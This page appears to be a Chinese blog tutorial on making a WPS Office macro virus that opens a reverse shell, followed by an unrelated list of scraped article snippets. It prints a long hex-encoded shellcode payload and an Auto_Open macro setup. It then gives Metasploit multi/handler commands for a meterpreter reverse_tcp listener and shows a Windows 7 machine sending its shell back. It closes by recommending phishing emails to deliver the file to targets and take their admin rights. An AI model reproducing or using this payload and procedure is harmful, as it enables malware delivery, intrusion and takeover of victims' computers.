00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2C&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H54&H30&H00&H00&H38&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H9C&H00&H45&H78&H69&H74&H50&H72&H6F&H63&H65&H73&H73&H00&H00&H00&H00&H30&H00&H00&H4B&H45&H52&H4E&H45&H4C&H33&H32&H2E&H64&H6C&H6C&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H58&H6E&H45&H66&H52&HA3&HDA&H2C&H7D&HB6&H7B&H67&H83&H36&HF7&H2F&H31&H96&HF7&H89&HE7&H86&H4C&H98&H40&H4A&HC0&H25&H23&H0E&HA4&H3C&HEB&H72&H98&HED&H38&HCD&H18&H5B&H51&HAC&HD2&H95&H9A&H92&HD8

使用WPS Word将上图所示 两个部分制作成可以使用的宏文件。进入装有WPS Office的Windows系统的靶机,然后打开WPS 2019,单击“开发工具”,接着在工具栏单击“宏”,就会弹出一个“宏”对话框,如下图所示:
WPS Office宏病毒实现shell反弹_第6张图片
起一个宏名,然后单击“创建”按钮,打开宏编辑界面,将我们在Kali 中生成的第一部分,也就是包括Auto_Open在内的几个函数复制到Normal-NewMacros中,覆盖原来的内容。如下图所示:
WPS Office宏病毒实现shell反弹_第7张图片
在WPS Word操作界面中,粘贴在KaliLinux中生成的第二部分,也就是字符形式的攻击载荷部分,如下图所示:
WPS Office宏病毒实现shell反弹_第8张图片
然后将构造好的宏病毒文件另存为宏可用文件。
WPS Office宏病毒实现shell反弹_第9张图片
然后再kali端启动metasploit,启动和设置payload并执行,命令如下:

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
.....
msf6 exploit(multi/handler) > set lhost 192.168. 59.128
.....
msf6 exploit(multi/handler) > set lport 4444
.....
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.59.128:4444

攻击机ip:192.168.59.128
反弹Shell端口:4444
WPS Office宏病毒实现shell反弹_第10张图片
然后在靶机上双击打开木马文件,结果如下:
Kali已经接收到win7反弹回连得shell:
WPS Office宏病毒实现shell反弹_第11张图片
键入shell得到win7的命令行
WPS Office宏病毒实现shell反弹_第12张图片
将该宏病毒文件通过邮件钓鱼等方式发送给目标,一旦目标打开该文件即可拿到其的管理员权限和shell,并进行下一步操作。

参考链接

  1. https://jl-zhenlaixiaowei.blog.csdn.net/article/details/124770692
  2. https://mp.weixin.qq.com/s/j1Sn7_Yi4W_XVGT2rLIzyg
  3. https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis

欢迎指正交流!!

你可能感兴趣的:(网络渗透,漏洞挖掘,wps,渗透测试,网络安全)

  • Web渗透练习技巧N则(一) jintonghuoya Web搜索引擎WordPressJoomla
    简介对于我们的生活来说,web的重要性不言而喻,因为这个看起来简单的几个页面与我们的生活的联系越来越紧密,我们有更多的个人信息由其承载往来于服务器和我们的电脑之间,正因为如此,web的安全也变得越来越重要,越来越不能被我们忽视。作为一个网络安全的工作者/爱好者,研究web的安全性也变得越来越重要。那么,接下来的几篇文章,我将陆续给大家介(ban)绍(yun)一些国外的大牛的web渗透的奇技淫巧,当
  • 自学黑客(网络安全) 白袍无涯 web安全网络安全网络安全系统安全运维计算机网络
    前言:想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟
  • 五分钟了解等级保护、风险评估和安全测评三者的区别和联系? 亿林等保 安全网络安全
    等级保护基本概念:网络安全等级保护是指对国家秘密信息、法人和其他组织和公民的专有信息以及公开信息和存储、传输、处理这些信息的信息系统分等级实行安全保护,对信息系统中使用的安全产品实行按等级管理,对信息系统中发生的信息安全事件等等级响应、处置。这里所指的信息系统,是指由计算机及其相关和配套的设备、设施构成的,按照一定的应用目标和规则对信息进行存储、传输、处理的系统或者网络;信息是指在信息系统中存储、
  • 一分钟了解小程序的等保测评 亿林科技网络安全 小程序
    小程序作为移动互联网应用的一种形式,其安全性和合规性受到了国家法律法规的严格要求。根据《中华人民共和国网络安全法》和《信息安全技术个人信息安全规范》等相关法律法规,小程序在开发和运营过程中需要进行等级保护测评(等保测评),以确保用户数据的安全和隐私保护。等保测评是指对信息系统进行安全等级保护的评估,包括安全技术措施和安全管理措施的评估。小程序的等保测评得分需要在70分以上,且信息系统没有高风险项才
  • 云WAF:网络安全的未来之选 亿林科技网络安全 web安全安全
    在数字化时代,网络安全面临着前所未有的挑战。云WAF(WebApplicationFirewall)作为一种创新的网络安全解决方案,正以其独特的优势引领网络安全的新潮流。云WAF(WebApplicationFirewall)作为保护Web应用安全的关键技术,正逐渐成为网络安全领域的新趋势。以下是几个主要原因:弹性扩展能力:云WAF基于云平台的资源和计算能力,可以实现动态的扩展和调整,根据实际流量
  • 【网络安全】URL解析器混淆绕过CSP实现XSS 秋说 网络安全web安全xss漏洞挖掘
    未经许可,不得转载。文章目录前言正文前言许多流行的静态网站生成器都存在图像CDN功能,它们通过优化网站中的图像来加快页面加载速度。例如:1、OptimizingImages|Next.js利用内置的next/image组件优化图像(nextjs.org)2、NuxtImage:Nuxt应用的图像优化即插即用的图像优化功能,使用内置优化器对图像进行调整(image.nuxt.com)这些工具的目标都
  • IP查询技术:构建网络安全的坚实防线 IP地址查询 web安全tcp/ip网络
    在数字化时代,企业网络面临着复杂多变的威胁与挑战。因此,构建一个稳固的网络安全体系至关重要。而IP查询技术,作为网络安全防御体系中的一把利剑,正日益成为企业防范网络风险的重要工具。什么是IP查询技术?IP查询技术,简而言之,是通过分析特定IP地址的活动和行为,来评估其潜在的网络威胁和安全风险。这一技术不仅关注IP地址的所在位置、历史活动记录,还深入剖析其连接模式、使用频率等关键信息。通过这些数据的
  • 谭晓生解读:AI如何重塑网络安全的未来? 腾讯云开发者 搜索引擎
    导语|当前,对网络安全而言,每一次新的信息技术浪潮都蕴含着巨大机会,同时也意味着巨大的挑战。大模型的发展,是带来了更大的AI安全风险,还是将赋能提升网络安全呢?网络安全正在迎来一场重大范式转移,“AIForSecurity和SecurityForAI”正成为网络安全的主战场。今天,我们特邀了北京赛博英杰科技有限公司创始人谭晓生老师,深谙安全之道的他将为我们深入解读人工智能时代下网络安全的发展趋势。
  • 编程学习笔记秘籍:开启高效学习之旅 青云交 java学习教学学习笔记传统纸质笔记本笔记工具选择笔记结构设计实践与复习策略掌握了高效记录并整理笔记的方法
    目录引言:正文:方向一:笔记工具选择传统纸质笔记本电子文档类工具(如MicrosoftWord、WPS等)专业编程笔记软件(如Notion、Evernote等)在线代码托管平台(如GitHub、GitLab等)方向二:笔记结构设计分类标签化建立知识关联方向三:实践与复习策略实践复习策略结束语:引言:“计算机科学教育不能使人成为程序员,就像学画笔和颜料不能使人成为画家一样。”——埃里克·雷蒙德。在当
  • 网络安全最新SARIMA季节项时间序列分析流程+python代码 2401_84301389 程序员python人工智能机器学习
    文章目录数据流程流程分割1画图2季节项和周期项的去除3平稳性检验4白噪声检验5模型拟合6模型定阶AIC/BIC准则7检查残差是否通过检验7.1若通过检验7.2若未通过检验8模型的预测9模型的评价画图均方差等总的代码参考数据数据网站:NationalAeronauticsandSpaceAdministrationGoddardInstituteforSpaceStudies主要分析的是北美陆地表面
  • Kafka【问题 03】Connection to node -1 ( IP 9092) could not be established(1) 2401_84265972 2024年程序员学习网络安全web安全面试
    还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!】93道网络安全面试题需要体系化学习资料的朋友,可以加我V获取:vip204888(备注网络安全
  • 网络安全最新网络安全-SSRF漏洞原理、攻击与防御(1),2024年最新网络安全程序员架构之路该如何继续学习 2401_84265972 程序员网络安全学习面试
    如何自学黑客&网络安全黑客零基础入门学习路线&规划初级黑客1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、GoogleHacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF
  • 什么是网络安全网状架构 (CSMA)? 网络研究观 网络研究观架构安全网络系统原则
    什么是网络安全中的威胁情报?什么是网络安全中的社会工程?什么是托管检测和响应(MDR)?什么是数字取证?什么是生物识别技术?什么是人肉搜索?什么是密文?什么是恶意软件?什么是端点检测和响应(EDR)?微信搜索关注公众号网络研究观,获取更多信息。网络安全网状架构(CSMA)是一组用于创建有效安全框架的组织原则。使用CSMA方法意味着设计一个可组合且可扩展的安全架构,具有易于扩展的接口、通用数据模式以
  • 怎样确保零信任架构在网络安全框架中的顺利整合 图幻未来 网络安全
    确保零信任架构在网络安全框架中顺利整合的方法与分析随着网络技术的飞速发展,网络安全问题日益严重,企业对于数据安全和网络防护的需求也不断提高。作为一种新型的网络安全策略,零信任架构(ZeroTrustArchitecture)受到了广泛关注。本文将探讨如何确保零信任架构在网络安全框架中顺利整合,并分析AI技术在零信任架构的应用场景。一、零信任架构概述零信任架构(ZTA)是一种以“永不信任,总是验证”
  • 【网络安全】如何预防xss 不会代码的小徐 web安全xss安全
    XSS(Cross-SiteScripting,跨站脚本攻击)是一种代码注入攻击。攻击者通过在目标网站注入恶意脚本,使其在用户浏览器中执行,从而窃取用户敏感信息如Cookie和SessionID。CSS在前端已经被用了,为了避免歧义用了XSS作为缩写。XSS的本质是恶意代码与网站正常代码混在一起,浏览器无法分辨它们的可信度,最终导致恶意代码被执行。XSS的危害浏览器无法区分恶意代码和正常代码,它们
  • “微软蓝屏”事件:网络安全问题的深刻反思 码农在写小程序 microsoftweb安全安全
    “微软蓝屏”事件:网络安全问题的深刻反思近日,由微软视窗系统软件更新引发的全球性“微软蓝屏”事件,不仅震惊了科技领域,更对全球IT基础设施的韧性与安全性提出了严峻考验。这次事件源于一个带有“缺陷”的软件更新,其影响范围之广、后果之严重,令人深思。面对如此大规模的系统中断,我们不得不重新审视网络安全与系统稳定性的问题,探讨如何构建更加稳固和安全的网络环境。一、软件更新流程中的风险管理和质量控制机制软
  • 怎样选择高防服务器进行租用? wanhengwangluo 网络安全运维
    在目前的互联网行业当中,线上网络业务发展的越来越迅速,同时也会受到各种各样的网络攻击,所以企业十分重视服务器的防御功能,而高防服务器就有着很高的防御能力,一般是指独立单个防御50G以上的服务器类型,可以为单个客户提供网络安全维护的服务器类型。那我们下面一起来探讨一下怎样选择高防服务器进行租用吧!企业在进行选择合适的高防服务器进行租用时,要选择合适的线路IP,线路通常分为单线、双线、多线,我们可以根
  • 防火墙部署基本方法 坚持可信 信息安全php开发语言
    防火墙部署基本方法防火墙部署是确保网络安全的重要步骤,通过合理的部署和配置防火墙,可以有效地保护网络资源,防止未经授权的访问和网络攻击。以下是防火墙部署的基本方法,包括部署步骤、配置建议和常见的部署拓扑。一、部署步骤1.需求分析步骤:评估网络结构:了解当前网络拓扑结构、流量模式和主要的网络设备。明确安全需求:确定需要保护的资源、潜在威胁以及安全目标。选择防火墙类型:根据需求选择合适的防火墙类型(硬
  • 方正小标宋简体、仿宋GB2312、楷体GB2312字体 java我跟你拼了 其他字体
    文章目录下载地址所有的文件wps使用方正小标宋简体、仿宋GB2312、楷体GB2312字体用途方正小标宋简体仿宋GB2312楷体GB2312下载地址【金山文档|WPS云文档】方正小标宋简体、仿宋GB2312、楷体GB2312https://kdocs.cn/l/cksgHDLneqDk所有的文件wps使用方正小标宋简体、仿宋GB2312、楷体GB2312字体用途方正小标宋简体应用场景:政府公文:方
  • 【网络安全 | CTF】攻防世界 Web_php_unserialize 解题详析 秋说 CTFCTF网络安全web安全
    文章目录代码审计解题思路wakeup绕过preg_match绕过base64绕过GET传参方法二代码审计这段代码首先定义了一个名为Demo的类,包含了一个私有变量$file和三个魔术方法__construct()、__destruct()和__wakeup()。其中:__construce()方法用于初始化$file变量__destruce方法用于输出文件内容__wakeup()方法检查当前对象的
  • ipv4v6双栈技术_【第二十六期】IPv6系列应用篇——数据中心IPv4/IPv6双栈架构探讨... weixin_39598308 ipv4v6双栈技术
    背景2017年,工业和信息化部发布了《推进互联网协议第六版(IPv6)规模部署行动计划》的通知,从国家层面推动下一代IP技术——IPv6的普及和应用。目标到2020年末,IPv6活跃用户数超过5亿,在互联网用户中的占比超过50%,新增网络地址不再使用私有IPv4地址。这就要求从互联网应用、网络基础设施、应用基础设施和网络安全等各个维度推动IPv6的改造和建设。互联网业务的IPv6改造不会一蹴而就,
  • 如何应对网络安全威胁和攻击 DY009J 网络安全DY009J
    前言应对网络安全威胁和攻击是现代企业和组织必须面对的重要挑战。以下是一套全面的策略,旨在增强网络安全防护,及时响应并有效减轻网络攻击的影响。1.构建强大的防御体系防火墙和入侵检测系统:部署先进的防火墙和入侵检测系统(IDS),监测和阻止未经授权的网络访问。加密通信:使用SSL/TLS协议加密数据传输,保护信息不被窃听或篡改。多因素认证:实施多因素认证(MFA),增加账户安全,防止密码泄露导致的攻击
  • 2024年最全API成批分配漏洞介绍与解决方案_api 成批分配,聊聊网络安全开发的现状和思考 2401_84132544 程序员web安全网络安全
    本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有
  • wps js宏一键修改文章格式 fjwangxi 高效办公wpsjavascript开发语言
    文章目录前言日常工作中,网上下载(复制)的文档,多数中间都会有多余的空格,或者乱码字符。同时还存在页面、表格大小、图片大小不统一的情况。重复查找替换字符,修改图片、表格占用了工作人员大量的时间。作者利用wps的js宏制作一键修改文件格式程序,以减轻工作负担。本文主要通过操作演示,帮助大家创建自定义宏工具栏,完成文档格式的一键修改。**注:演示软件为wps2019版,word无法使用。文中资源见文末
  • webview无法加载http流量及Expo修改Android权限 小童不学前端 ReactNatviereactnativeExpoandroidhttp
    文章目录前言react-native-webview无法加载http流量报错修改http网络权限1.迁移到EASBuild2.创建android文件夹3.修改AndroidManifest.xml4.添加网络安全配置文件(可选)5.构建项目6.使用HTTPS前言在使用RN直接创建项目时,我们可以进行修改里面的一些权限,但是当我们使用Expo开发时,却发现没有android的这些文件夹,所以修改权限
  • 网络ACL详解-从原理到实战模拟 CloudJourney 网络学习
    引言在复杂多变的网络环境中,保障网络安全和数据传输的合法性、高效性至关重要。访问控制列表(AccessControlLists,简称ACL)作为网络安全的重要组成部分,广泛应用于各种网络设备中,用以控制网络流量的流向和访问权限。本文将以华为网络设备为体系,深入探讨ACL的定义、原理、内部流程、应用场景,并通过实战案例展示其配置和应用方法。一、ACL的定义与原理1.1定义访问控制列表(ACL)是一种
  • 【无标题】XSS安全防护:responseBody (输入流可重复读) 配置 syfjava RuoYi-Vue-Plus学习RuoYi-Vue-Plus
    接上文:配置XSS过滤器XXS安全防护:拦截器+注解实现校验-CSDN博客XSS(跨站脚本)攻击是一种网络安全威胁,允许攻击者注入恶意脚本到看似安全的网站。当用户浏览这些被注入恶意代码的网页时,恶意脚本会在用户的浏览器环境中执行,这可能导致多种安全问题,如窃取敏感数据、劫持用户会话等。这些攻击利用了应用程序对用户输入处理不当的问题。预防方法包括输入验证、输出编码等。https://blog.csd
  • 网络安全(黑客)自学 白帽子凯哥 web安全安全网络安全服务器网络
    一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你是一
  • 如何用3个月零基础入门网络安全?_网络安全零基础怎么学习 白帽黑客啊一 web安全学习安全网安入门flutter
    前言写这篇教程的初衷是很多朋友都想了解如何入门/转行网络安全,实现自己的“黑客梦”。文章的宗旨是:1.指出一些自学的误区2.提供客观可行的学习表3.推荐我认为适合小白学习的资源.大佬绕道哈!→点击获取网络安全资料·攻略←一、自学网络安全学习的误区和陷阱1.不要试图先成为一名程序员(以编程为基础的学习)再开始学习我在之前的回答中,我都一再强调不要以编程为基础再开始学习网络安全,一般来说,学习编程不但
  • 数据分析-13-时间序列异常值检测的类型及常见的检测方法 皮皮冰燃 数据分析数据分析
    参考时间序列异常值的分类及检测参考异常值数据预警分析1时间序列异常的类型时间序列异常检测是数据处理和分析的重要环节,广泛应用于量化交易、网络安全检测、自动驾驶汽车和大型工业设备日常维护等领域。在时间序列数据中,异常通常指的是与正常数据模式显著不同的数据点,可能由系统故障、错误或外部干扰引起。异常数据,也称为离群点,是指在数据集中与其他数据点明显不同的样本。这些数据点往往不符合预期的模式或行为,可能
  • JAVA基础 灵静志远 位运算加载Date字符串池覆盖
    一、类的初始化顺序 1 (静态变量,静态代码块)-->(变量,初始化块)--> 构造器 同一括号里的,根据它们在程序中的顺序来决定。上面所述是同一类中。如果是继承的情况,那就在父类到子类交替初始化。 二、String 1 String a = "abc"; JAVA虚拟机首先在字符串池中查找是否已经存在了值为"abc"的对象,根
  • keepalived实现redis主从高可用 bylijinnan redis
    方案说明 两台机器(称为A和B),以统一的VIP对外提供服务 1.正常情况下,A和B都启动,B会把A的数据同步过来(B is slave of A) 2.当A挂了后,VIP漂移到B;B的keepalived 通知redis 执行:slaveof no one,由B提供服务 3.当A起来后,VIP不切换,仍在B上面;而A的keepalived 通知redis 执行slaveof B,开始
  • java文件操作大全 0624chenhong java
    最近在博客园看到一篇比较全面的文件操作文章,转过来留着。 http://www.cnblogs.com/zhuocheng/archive/2011/12/12/2285290.html 转自http://blog.sina.com.cn/s/blog_4a9f789a0100ik3p.html 一.获得控制台用户输入的信息    &nbs
  • android学习任务 不懂事的小屁孩 工作
    任务 完成情况 搞清楚带箭头的pupupwindows和不带的使用 已完成 熟练使用pupupwindows和alertdialog,并搞清楚两者的区别 已完成 熟练使用android的线程handler,并敲示例代码 进行中 了解游戏2048的流程,并完成其代码工作 进行中-差几个actionbar 研究一下android的动画效果,写一个实例 已完成 复习fragem
  • zoom.js 换个号韩国红果果 oom
    它的基于bootstrap 的 https://raw.github.com/twbs/bootstrap/master/js/transition.js  transition.js模块引用顺序 <link rel="stylesheet" href="style/zoom.css"> <script src=&q
  • 详解Oracle云操作系统Solaris 11.2 蓝儿唯美 Solaris
    当Oracle发布Solaris 11时,它将自己的操作系统称为第一个面向云的操作系统。Oracle在发布Solaris 11.2时继续它以云为中心的基调。但是,这些说法没有告诉我们为什么Solaris是配得上云的。幸好,我们不需要等太久。Solaris11.2有4个重要的技术可以在一个有效的云实现中发挥重要作用:OpenStack、内核域、统一存档(UA)和弹性虚拟交换(EVS)。 
  • spring学习——springmvc(一) a-john springMVC
    Spring MVC基于模型-视图-控制器(Model-View-Controller,MVC)实现,能够帮助我们构建像Spring框架那样灵活和松耦合的Web应用程序。   1,跟踪Spring MVC的请求 请求的第一站是Spring的DispatcherServlet。与大多数基于Java的Web框架一样,Spring MVC所有的请求都会通过一个前端控制器Servlet。前
  • hdu4342 History repeat itself-------多校联合五 aijuans 数论
    水题就不多说什么了。 #include<iostream>#include<cstdlib>#include<stdio.h>#define ll __int64using namespace std;int main(){ int t; ll n; scanf("%d",&t); while(t--)
  • EJB和javabean的区别 asia007 beanejb
    EJB不是一般的JavaBean,EJB是企业级JavaBean,EJB一共分为3种,实体Bean,消息Bean,会话Bean,书写EJB是需要遵循一定的规范的,具体规范你可以参考相关的资料.另外,要运行EJB,你需要相应的EJB容器,比如Weblogic,Jboss等,而JavaBean不需要,只需要安装Tomcat就可以了   1.EJB用于服务端应用开发, 而JavaBeans
  • Struts的action和Result总结 百合不是茶 strutsAction配置Result配置
        一:Action的配置详解:      下面是一个Struts中一个空的Struts.xml的配置文件     <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE struts PUBLIC &quo
  • 如何带好自已的团队 bijian1013 项目管理团队管理团队
    在网上看到博客" 怎么才能让团队成员好好干活"的评论,觉得写的比较好。 原文如下: 我做团队管理有几年了吧,我和你分享一下我认为带好团队的几点: 1.诚信         对团队内成员,无论是技术研究、交流、问题探讨,要尽可能的保持一种诚信的态度,用心去做好,你的团队会感觉得到。 2.努力提
  • Java代码混淆工具 sunjing ProGuard
    Open Source Obfuscators ProGuard http://java-source.net/open-source/obfuscators/proguardProGuard is a free Java class file shrinker and obfuscator. It can detect and remove unused classes, fields, m
  • 【Redis三】基于Redis sentinel的自动failover主从复制 bit1129 redis
    在第二篇中使用2.8.17搭建了主从复制,但是它存在Master单点问题,为了解决这个问题,Redis从2.6开始引入sentinel,用于监控和管理Redis的主从复制环境,进行自动failover,即Master挂了后,sentinel自动从从服务器选出一个Master使主从复制集群仍然可以工作,如果Master醒来再次加入集群,只能以从服务器的形式工作。   什么是Sentine
  • 使用代理实现Hibernate Dao层自动事务 白糖_ DAOspringAOP框架Hibernate
    都说spring利用AOP实现自动事务处理机制非常好,但在只有hibernate这个框架情况下,我们开启session、管理事务就往往很麻烦。 public void save(Object obj){ Session session = this.getSession(); Transaction tran = session.beginTransaction(); try
  • maven3实战读书笔记 braveCS maven3
    Maven简介 是什么? Is a software project management and comprehension tool.项目管理工具 是基于POM概念(工程对象模型) [设计重复、编码重复、文档重复、构建重复,maven最大化消除了构建的重复] [与XP:简单、交流与反馈;测试驱动开发、十分钟构建、持续集成、富有信息的工作区]     功能:
  • 编程之美-子数组的最大乘积 bylijinnan 编程之美
    public class MaxProduct { /** * 编程之美 子数组的最大乘积 * 题目: 给定一个长度为N的整数数组,只允许使用乘法,不能用除法,计算任意N-1个数的组合中乘积中最大的一组,并写出算法的时间复杂度。 * 以下程序对应书上两种方法,求得“乘积中最大的一组”的乘积——都是有溢出的可能的。 * 但按题目的意思,是要求得这个子数组,而不
  • 读书笔记-2 chengxuyuancsdn 读书笔记
    1、反射 2、oracle年-月-日 时-分-秒 3、oracle创建有参、无参函数 4、oracle行转列 5、Struts2拦截器 6、Filter过滤器(web.xml) 1、反射 (1)检查类的结构 在java.lang.reflect包里有3个类Field,Method,Constructor分别用于描述类的域、方法和构造器。 2、oracle年月日时分秒 s
  • [求学与房地产]慎重选择IT培训学校 comsci it
          关于培训学校的教学和教师的问题,我们就不讨论了,我主要关心的是这个问题       培训学校的教学楼和宿舍的环境和稳定性问题       我们大家都知道,房子是一个比较昂贵的东西,特别是那种能够当教室的房子... &nb
  • RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 daizj oraclermanfilespersetPARALLELISM
    RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 转 PARALLELISM --- 我们还可以通过parallelism参数来指定同时"自动"创建多少个通道: RMAN > configure device type disk parallelism 3 ; 表示启动三个通道,可以加快备份恢复的速度。
  • 简单排序:冒泡排序 dieslrae 冒泡排序
    public void bubbleSort(int[] array){ for(int i=1;i<array.length;i++){ for(int k=0;k<array.length-i;k++){ if(array[k] > array[k+1]){
  • 初二上学期难记单词三 dcj3sjt126com sciet
    concert 音乐会 tonight 今晚 famous 有名的;著名的 song 歌曲 thousand 千 accident 事故;灾难 careless 粗心的,大意的 break 折断;断裂;破碎 heart 心(脏) happen  偶尔发生,碰巧 tourist 旅游者;观光者 science (自然)科学 marry 结婚 subject 题目;
  • I.安装Memcahce 1. 安装依赖包libevent Memcache需要安装libevent,所以安装前可能需要执行 Shell代码 收藏代码 dcj3sjt126com redis
    wget http://download.redis.io/redis-stable.tar.gz tar xvzf redis-stable.tar.gz cd redis-stable make   前面3步应该没有问题,主要的问题是执行make的时候,出现了异常。 异常一: make[2]: cc: Command not found 异常原因:没有安装g
  • 并发容器 shuizhaosi888 并发容器
       通过并发容器来改善同步容器的性能,同步容器将所有对容器状态的访问都串行化,来实现线程安全,这种方式严重降低并发性,当多个线程访问时,吞吐量严重降低。    并发容器ConcurrentHashMap       替代同步基于散列的Map,通过Lock控制。   &nb
  • Spring Security(12)——Remember-Me功能 234390216 Spring SecurityRemember Me记住我
    Remember-Me功能   目录   1.1     概述 1.2     基于简单加密token的方法 1.3     基于持久化token的方法 1.4     Remember-Me相关接口和实现
  • 位运算 焦志广 位运算
    一、位运算符C语言提供了六种位运算符: & 按位与 | 按位或 ^ 按位异或 ~ 取反 << 左移 >> 右移 1. 按位与运算 按位与运算符"&"是双目运算符。其功能是参与运算的两数各对应的二进位相与。只有对应的两个二进位均为1时,结果位才为1 ,否则为0。参与运算的数以补码方式出现。 例如:9&am
  • nodejs 数据库连接 mongodb mysql liguangsong mongodbmysqlnode数据库连接
    1.mysql 连接    package.json中dependencies加入     "mysql":"~2.7.0"    执行 npm install      在config 下创建文件 database.js    
  • java动态编译 olive6615 javaHotSpotjvm动态编译
        在HotSpot虚拟机中,有两个技术是至关重要的,即动态编译(Dynamic compilation)和Profiling。     HotSpot是如何动态编译Javad的bytecode呢?Java bytecode是以解释方式被load到虚拟机的。HotSpot里有一个运行监视器,即Profile Monitor,专门监视
  • Storm0.9.5的集群部署配置优化 roadrunners 优化storm.yaml
